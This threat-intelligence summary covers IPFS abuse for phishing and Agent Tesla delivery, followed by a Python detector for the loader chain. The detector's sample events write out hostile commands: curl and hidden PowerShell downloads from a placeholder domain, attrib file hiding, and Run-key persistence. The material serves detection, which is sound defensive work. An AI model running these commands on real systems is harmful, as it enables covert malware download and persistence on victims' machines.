IPFS: A Web3 Technology Used to Host Phishing & Malware
Category: Malware Campaigns | Industry: Global | Level: Tactical | Source: Cisco Talos
Cisco Talos researchers have discovered threat actors abusing the InterPlanetary File System (IPFS), a Web3 protocol and peer-to-peer network, to host malicious content. Current ongoing campaigns have used the IPFS network to host malware payloads and phishing kit infrastructure. Although it is being abused, IPFS has legitimate uses, so security analysts may find it hard to delineate malicious from benign activity. Malicious use of IPFS has been ongoing throughout 2022; however, Cisco Talos telemetry showed a sharp spike in September 2022. Threat actors are turning to this technology because of the protocol's advantages: "It provides low-cost storage for malicious payloads while offering resilience against content moderation, effectively acting as 'bulletproof hosting' for adversaries." Threat actors using IPFS use the same Microsoft login and DocuSign credential-harvesting phishing templates. In one campaign, Agent Tesla malware was delivered from a phishing email hosted on IPFS infrastructure. The threat actors' loader behaved consistently across samples, using the LOLBins cmd and PowerShell to download Python, a Python executable, and second-stage malware with cURL. Downloaded files are hidden using the attrib command, and persistence is created with entries in the Run registry key. Campaigns using IPFS technology are likely to increase and develop, as Cisco Talos points out the platform is "resilient against content moderation and law enforcement activities."
- AgentTesla - Infection
Anvilogic Use Cases:
- Invoke-WebRequest Command
- Suspicious Executable by CMD.exe
- Compressed File Execution
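As an added example (not part of the Talos report or of Anvilogic's own detection content), the following Python correlates constructed process-creation events against the loader chain summarised above: a cmd/PowerShell-launched cURL or Invoke-WebRequest download, attrib hiding of the dropped file, and Run-key persistence. Host names, file paths and the placeholder domain are assumptions; the flagging threshold (two distinct stages on one host) is a tunable choice, not a value from the report.

```python
import re
from collections import defaultdict

# Constructed process-creation events (hypothetical hosts, file paths and a
# placeholder domain): WS01 shows the loader chain, WS02 a benign admin command.
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c curl.exe -o C:\Users\Public\py.zip http://placeholder.invalid/py.zip"},
    {"host": "WS01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -w hidden Invoke-WebRequest http://placeholder.invalid/s2 -OutFile C:\Users\Public\s2.exe"},
    {"host": "WS01", "image": r"C:\Windows\System32\attrib.exe",
     "cmdline": r"attrib +h +s C:\Users\Public\s2.exe"},
    {"host": "WS01", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v upd /t REG_SZ /d C:\Users\Public\s2.exe"},
    {"host": "WS02", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c dir C:\Users\Public"},
]

# One (tag, pattern) pair per stage of the chain described in the summary.
STAGE_PATTERNS = [
    ("lolbin_download", re.compile(r"\b(curl(\.exe)?|invoke-webrequest|iwr)\b", re.I)),
    ("attrib_hide", re.compile(r"\battrib(\.exe)?\b.*\+h", re.I)),
    ("run_key_persistence", re.compile(r"\breg(\.exe)?\s+add\b.*\\currentversion\\run\b", re.I)),
]
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")

def tag_event(event):
    """Return the set of stage tags a single process-creation event matches."""
    tags = set()
    image = event["image"].lower()
    for tag, pattern in STAGE_PATTERNS:
        if not pattern.search(event["cmdline"]):
            continue
        # The download stage only counts when issued from cmd/PowerShell (LOLBin use);
        # a direct curl.exe process or a browser download is deliberately not tagged.
        if tag == "lolbin_download" and not image.endswith(SHELLS):
            continue
        tags.add(tag)
    return tags

def flag_hosts(events, min_stages=2):
    """Correlate tags per host and flag hosts showing >= min_stages distinct stages."""
    seen = defaultdict(set)
    for event in events:
        seen[event["host"]] |= tag_event(event)
    return {host: sorted(tags) for host, tags in seen.items() if len(tags) >= min_stages}

if __name__ == "__main__":
    for host, stages in flag_hosts(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(stages)}")
```

Single-stage hits (one Invoke-WebRequest alone) are common in benign administration, which is why the correlation keys on several stages landing on the same host rather than on any one command line.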